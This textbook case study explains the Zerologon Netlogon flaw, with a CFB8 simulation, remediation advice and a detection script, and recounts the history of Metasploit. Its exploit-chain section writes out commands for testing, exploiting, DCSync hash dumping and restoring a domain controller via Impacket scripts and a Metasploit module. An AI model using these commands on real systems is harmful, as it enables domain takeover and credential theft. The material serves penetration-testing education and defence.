Case Study 12.2: Zerologon (CVE-2020-1472) and the Origin Story of Metasploit

Part A: Zerologon — A Cryptographic Catastrophe

Overview

On September 11, 2020, researcher Tom Tervoort of Secura published technical details of CVE-2020-1472, a vulnerability he named "Zerologon." The flaw, rated CVSS 10.0 (the maximum severity score), allowed any attacker with network access to a domain controller to completely compromise the entire Active Directory domain in approximately three seconds. No credentials were required. No user interaction was needed. The vulnerability existed in the Netlogon Remote Protocol (MS-NRPC), a core authentication protocol used by every Windows domain controller.

Microsoft had released a patch in August 2020, but the severity of the vulnerability and the ease of exploitation made Zerologon one of the most dangerous Active Directory vulnerabilities ever discovered. Within days of the technical publication, working exploits appeared, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive requiring all federal agencies to patch within three days.

The Vulnerability

The Netlogon Remote Protocol uses a custom cryptographic authentication scheme called the ComputeNetlogonCredential function. This function uses AES-CFB8 (AES in Cipher Feedback mode with 8-bit feedback) to encrypt a challenge value, producing a credential used to authenticate the client to the server.

The critical flaw was in how AES-CFB8 was initialized: the initialization vector (IV) was always set to 16 zero bytes. In CFB8, each plaintext byte is XORed with the first byte of the AES output for a 16-byte shift register that starts as the IV and then takes in each ciphertext byte as it is produced. With an all-zero IV and an all-zero plaintext, the first ciphertext byte is zero whenever the first byte of AES(key, 0…0) is zero, which is true for roughly 1 in 256 keys; the register then stays all zeros, so every subsequent ciphertext byte is zero as well, giving a 1-in-256 chance that the whole ciphertext is all zeros. Because the session key depends on the server's challenge and therefore changes on every attempt, if both the client challenge and the client credential are set to all zeros there is a 1-in-256 probability per attempt that the server will accept the authentication.
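The CFB8 shift-register behaviour described above, as an added example that is not code from Secura, Microsoft or the original page. It stands a keyed SHA-256 PRF in for the AES encrypt direction (an assumption that keeps it dependency-free; CFB8 never needs the decrypt direction, and the 1-in-256 figure is the same with real AES) and derives its session keys deterministically to model repeated attempts.

```python
import hashlib

BLOCK_SIZE = 16
ZERO_IV = bytes(BLOCK_SIZE)


def forward_cipher(key: bytes, block: bytes) -> bytes:
    """Stand-in for the AES encrypt direction (assumption for this example:
    a keyed SHA-256 PRF truncated to 16 bytes; CFB8 only ever runs the block
    cipher forward, so the mode's behaviour is reproduced exactly)."""
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB with 8-bit feedback as ComputeNetlogonCredential uses it: each
    plaintext byte is XORed with the first output byte of the cipher applied
    to a 16-byte shift register; the ciphertext byte is then shifted into
    the register and the oldest byte drops out."""
    register = bytearray(iv)
    ciphertext = bytearray()
    for p in plaintext:
        c = p ^ forward_cipher(key, bytes(register))[0]
        ciphertext.append(c)
        register = register[1:] + bytes([c])
    return bytes(ciphertext)

def zero_challenge_accepted(key: bytes, iv: bytes) -> bool:
    """The comparison a Zerologon attempt wins: an all-zero 8-byte client
    challenge encrypting to the all-zero 8-byte credential the client sent."""
    return cfb8_encrypt(key, iv, bytes(8)) == bytes(8)

def acceptance_count(trials: int, iv: bytes) -> int:
    """Count accepting session keys among `trials` distinct keys. Keys are
    constructed deterministically here; in Netlogon each attempt derives a
    fresh session key from the server's challenge, so this models repeated
    authentication attempts against one domain controller."""
    keys = (hashlib.sha256(b"session-key-%d" % i).digest() for i in range(trials))
    return sum(zero_challenge_accepted(k, iv) for k in keys)


if __name__ == "__main__":
    n = 25600
    # With a zero IV the register stays all-zero once the first ciphertext
    # byte is zero, so the whole credential is zero for about 1/256 of keys.
    print("zero IV:   ", acceptance_count(n, ZERO_IV), "of", n)
    # Any non-zero IV breaks that self-reinforcement: each further byte is an
    # independent 1/256 event, so an all-zero credential needs 2^-64 luck.
    print("nonzero IV:", acceptance_count(n, b"\x5a" * BLOCK_SIZE), "of", n)
```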

An attacker simply needed to attempt authentication with all-zero values approximately 256 times. At network speed, this took about three seconds. Once authenticated, the attacker could:

  1. Set the domain controller's machine account password to empty — This effectively gave the attacker the domain controller's credentials.
  2. Use DCSync to replicate all domain password hashes — Including the krbtgt hash, which allows Golden Ticket attacks.
  3. Achieve complete domain compromise — Every user, every system, every service account.

The Exploit Chain

The attack sequence demonstrates the devastating efficiency of Zerologon:

Step 1: Attacker sends Netlogon authentication with all-zero credentials
        → Repeats up to 256 times (takes ~3 seconds)
        → Server eventually accepts due to the crypto flaw

Step 2: Attacker sets the DC machine account password to an empty value
        → Uses NetrServerPasswordSet2 with all-zero ciphertext
        → DC's password in AD is now empty

Step 3: Attacker uses the empty password for DCSync
        → Replicates all password hashes from the domain
        → Extracts Administrator NTLM hash, krbtgt hash, etc.

Step 4: Attacker uses extracted hashes for pass-the-hash
        → Full domain admin access achieved
        → Total time: under 10 seconds

Using Impacket's zerologon exploit:

# Test for vulnerability
python3 zerologon_tester.py DC01 10.10.10.50

# Exploit (sets DC machine password to empty)
python3 cve-2020-1472-exploit.py DC01 10.10.10.50

# DCSync to extract all hashes
secretsdump.py -just-dc -no-pass 'MEDSECURE/DC01$@10.10.10.50'

# Restore the DC machine password (CRITICAL - must be done after testing)
python3 restorepassword.py MEDSECURE/DC01@DC01 -target-ip 10.10.10.50 \
  -hexpass <original_hash>

In Metasploit:

msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 10.10.10.50
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME DC01
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run

Impact on MedSecure Scenario

In the MedSecure penetration test, if the domain controller is vulnerable to Zerologon, the implications are catastrophic:

  • The attacker gains access to every user account, including all clinical staff
  • Every service account credential is exposed, including those for the EHR database
  • Patient records, billing data, and administrative systems are fully accessible
  • The attacker can create persistent domain admin access that survives password resets
  • Active Directory trust relationships with partner organizations may also be compromised

This finding would be rated Critical in any penetration test report, with immediate remediation required.

⚖️ Legal Note: When exploiting Zerologon in authorized testing, you MUST restore the domain controller's machine account password immediately after demonstrating the vulnerability. Setting the password to empty disrupts all domain authentication and will cause immediate, severe operational impact. This exploit should ideally be tested in a non-production environment or during a scheduled maintenance window with the client's domain administrator present.

Remediation

Microsoft's remediation came in two phases:

  1. August 2020 patch — Updated the Netlogon protocol to require secure RPC, but initially in compatibility mode to avoid breaking legacy systems.
  2. February 2021 enforcement — Full enforcement mode, requiring all Netlogon connections to use secure RPC. Legacy systems that could not support secure RPC would be unable to authenticate.

For organizations like MedSecure:

  • Apply the patch immediately
  • Enable full enforcement mode
  • Monitor for Netlogon authentication events (Event ID 5829) from non-compliant devices
  • Identify and update or replace legacy systems that cannot use secure RPC

Defensive Detection

🔵 Blue Team Perspective: Detect Zerologon exploitation by monitoring:

  • Windows Event ID 4742 — Computer account changed (the machine password reset)
  • Windows Event ID 5829 — Netlogon allowed a vulnerable Netlogon secure channel connection
  • Multiple Netlogon authentication failures followed by a success in rapid succession
  • DCSync traffic — DS-Replication-Get-Changes operations from non-domain-controller IPs
  • Network traffic analysis showing many Netlogon RPC calls with zero-byte payloads
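An added correlation check over constructed sample telemetry (not code from the original page or any vendor) that implements three of the indicators above: a burst of Netlogon authentication failures followed by a success from one source, Event ID 4742 against a known domain controller machine account, and Event ID 5829. The record layout, field names and thresholds are assumptions made for this example.

```python
from collections import defaultdict

# Constructed sample telemetry for this example (not real logs): one record
# per Netlogon authentication attempt as a network sensor might emit it, plus
# Windows security events. Field names and values are assumptions.
EVENTS = [
    {"ts": 99.0, "kind": "win_event", "event_id": 5829, "machine": "LEGACY01$"},
    # 200 failed attempts in two seconds from one host, then a success
    *[{"ts": 100.0 + i * 0.01, "kind": "netlogon_auth", "src": "10.10.10.99",
       "result": "fail"} for i in range(200)],
    {"ts": 102.5, "kind": "netlogon_auth", "src": "10.10.10.99", "result": "success"},
    {"ts": 103.0, "kind": "win_event", "event_id": 4742, "target": "DC01$"},
    # benign: a single failure and a much later success from a workstation
    {"ts": 500.0, "kind": "netlogon_auth", "src": "10.10.10.20", "result": "fail"},
    {"ts": 560.0, "kind": "netlogon_auth", "src": "10.10.10.20", "result": "success"},
]

DC_ACCOUNTS = {"DC01$"}       # machine accounts of known domain controllers
BURST_MIN_FAILURES = 50       # thresholds are assumptions; tune per estate
BURST_WINDOW_SECONDS = 10.0


def detect(events, dc_accounts=DC_ACCOUNTS):
    """Return alerts for the indicators above, processing events in
    timestamp order: a burst of Netlogon failures followed by a success from
    one source, a 4742 change to a DC machine account, and a 5829 event."""
    alerts = []
    failures = defaultdict(list)  # src -> timestamps of recent failures
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["kind"] == "netlogon_auth":
            recent = failures[e["src"]]
            while recent and e["ts"] - recent[0] > BURST_WINDOW_SECONDS:
                recent.pop(0)  # slide the window forward
            if e["result"] == "fail":
                recent.append(e["ts"])
            elif len(recent) >= BURST_MIN_FAILURES:
                alerts.append(("netlogon_burst_then_success", e["src"], len(recent)))
                recent.clear()
        elif e["kind"] == "win_event":
            if e["event_id"] == 4742 and e["target"] in dc_accounts:
                alerts.append(("dc_machine_account_changed", e["target"], e["ts"]))
            elif e["event_id"] == 5829:
                alerts.append(("vulnerable_netlogon_channel", e["machine"], e["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```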


Part B: The Origin Story of Metasploit — HD Moore's Revolution

The Problem Before Metasploit

Before 2003, the exploit landscape was chaotic. Security researchers published exploits as standalone scripts—typically in C, Perl, or Python—each with its own command-line interface, dependencies, and quirks. A penetration tester might need dozens of different tools, each requiring specific compilation environments, library versions, and configuration.

Common problems included:

  • No standardization — Every exploit had a different interface and different options
  • Payload coupling — Most exploits had their payloads hardcoded; changing the payload meant modifying source code
  • Limited platform support — An exploit written for Linux often would not compile on other platforms
  • No modularity — If you wanted to combine an exploit with a different payload, you had to write custom integration code
  • Poor documentation — Many public exploits were poorly documented, unreliable, or intentionally backdoored

HD Moore's Vision

H.D. Moore was a security researcher who had spent years navigating this fragmented ecosystem. In 2003, at age 22, he released the first version of the Metasploit Framework with a radical premise: create a modular platform where exploits and payloads were separate, interchangeable components.

The first version, written in Perl, included just 11 exploits and a handful of payloads. But its architecture was revolutionary:

  • Modularity — Exploits and payloads were separate modules that could be mixed and matched
  • Standardized interface — All modules used the same option-setting conventions
  • Payload generation — Payloads were generated dynamically, allowing customization
  • Open source — The framework was freely available, encouraging community contribution

Moore's original announcement on the Bugtraq mailing list was understated, but the security community immediately recognized the significance.

Evolution and Growth

Metasploit 2.x (2004) — Gained significant traction. The modular architecture attracted contributors who began adding new exploits at an accelerating pace. The framework grew from 11 to over 100 exploits.

Metasploit 3.0 (2007) — A complete rewrite in Ruby. Moore chose Ruby for its metaprogramming capabilities, object-oriented design, and cross-platform support. This rewrite established the architecture that persists today:

  • The Rex (Ruby Extension) library for networking
  • The Core library for module management
  • The Base library for simplified interfaces
  • The concept of mixins for shared functionality

Meterpreter was also introduced in this era, providing an advanced, in-memory, extensible payload that became the framework's signature capability.

Rapid7 Acquisition (2009) — Rapid7, a security analytics company, acquired the Metasploit Project and hired Moore as Chief Security Officer. This provided dedicated funding and development resources while keeping the framework open source. Rapid7 built commercial products (Metasploit Pro, Metasploit Express) on top of the open-source core, following the successful open-core business model.

Post-Acquisition Growth (2009-Present):

  • Module count grew from hundreds to thousands
  • Community contribution process formalized (GitHub pull requests)
  • Integration with Rapid7's vulnerability scanning products
  • Addition of new module types (Evasion, introduced in Metasploit 5.0)
  • REST API for programmatic access
  • Modernized database schema and workspace management

HD Moore's Impact

Moore's contribution to security extends far beyond Metasploit:

  • Critical.io / Project Sonar — Large-scale internet scanning projects that mapped the global attack surface
  • Rapid7 Labs — Research that identified systemic vulnerabilities in embedded systems, IoT devices, and SCADA systems
  • Security philosophy — Moore championed the idea that security tools should be freely available to defenders, arguing that attackers already had these capabilities

Moore's philosophy was succinctly expressed in his frequently quoted statement: "The goal of Metasploit is to provide useful information to people who perform penetration testing, IDS signature development, and exploit research."

Metasploit's Impact on the Industry

The Metasploit Framework fundamentally changed information security in several ways:

1. Democratization of Security Testing — Before Metasploit, exploitation skills were concentrated among a small elite. Metasploit made sophisticated exploitation accessible to a much broader community, enabling:

  • Organizations to test their own defenses
  • Security consultants to conduct more comprehensive assessments
  • Students to learn exploitation in structured, safe environments
  • Defenders to understand attacker capabilities

2. Accelerated Patch Adoption — When a new vulnerability is disclosed, a Metasploit module often follows within days. This creates urgency for patching—organizations can no longer assume that exploitation requires elite skills. The Zerologon Metasploit module, for example, made it trivially easy to demonstrate the vulnerability, motivating rapid patching.

3. Professionalization of Penetration Testing — Metasploit provided a standardized platform that enabled consistent, repeatable testing. This professionalized the penetration testing industry and contributed to the development of certifications (OSCP, GPEN) that assess practical exploitation skills.

4. Informed Defensive Development — Understanding how Metasploit modules work helps defenders build better detections. Many IDS/IPS signatures are developed by analyzing Metasploit modules. Endpoint detection rules often specifically target Meterpreter behaviors.

Ethical Debates

Metasploit's existence has always been controversial:

Critics argue:

  • It lowers the barrier for malicious hacking
  • Script kiddies can use it without understanding the underlying vulnerabilities
  • Automated exploitation tools make attacks faster and more scalable

Supporters counter:

  • Attackers already have these capabilities; tools like Metasploit ensure defenders can match them
  • Open-source tools are auditable and trustworthy, unlike underground tools that may be backdoored
  • Education requires accessible tools
  • The alternative—security through obscurity—has never worked

The consensus in the professional security community strongly favors Metasploit's existence. The framework is integral to defensive security, education, and the responsible disclosure ecosystem.

Discussion Questions

  1. Zerologon was patched a month before the technical details were published. Why did many organizations remain vulnerable? What does this tell us about the gap between patch availability and patch adoption?

  2. The Zerologon vulnerability stems from a flawed use of AES-CFB8 with a zero IV. This was a specification flaw, not an implementation bug. What are the implications of cryptographic design flaws in core authentication protocols?

  3. HD Moore was 22 when he created Metasploit. What does the history of Metasploit tell us about the role of individual innovators in security?

  4. Should exploit frameworks like Metasploit remain freely available, or should access be restricted to certified professionals? What would be the consequences of either policy?

  5. If you discovered a vulnerability as severe as Zerologon in the MedSecure domain controller during a penetration test, how would you handle the situation? Consider: immediate notification, proof-of-concept depth, and cleanup requirements.

References

  • Secura. (2020). "Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)."
  • CISA. (2020). "Emergency Directive 20-04: Mitigate Netlogon Elevation of Privilege Vulnerability."
  • Microsoft. (2020). "How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472."
  • Moore, H.D. (2003). "The Metasploit Project." Bugtraq mailing list announcement.
  • Kennedy, D., O'Gorman, J., Kearns, D., & Aharoni, M. (2011). Metasploit: The Penetration Tester's Guide. No Starch Press.
  • Rapid7. (2025). "Metasploit Framework Documentation." docs.metasploit.com.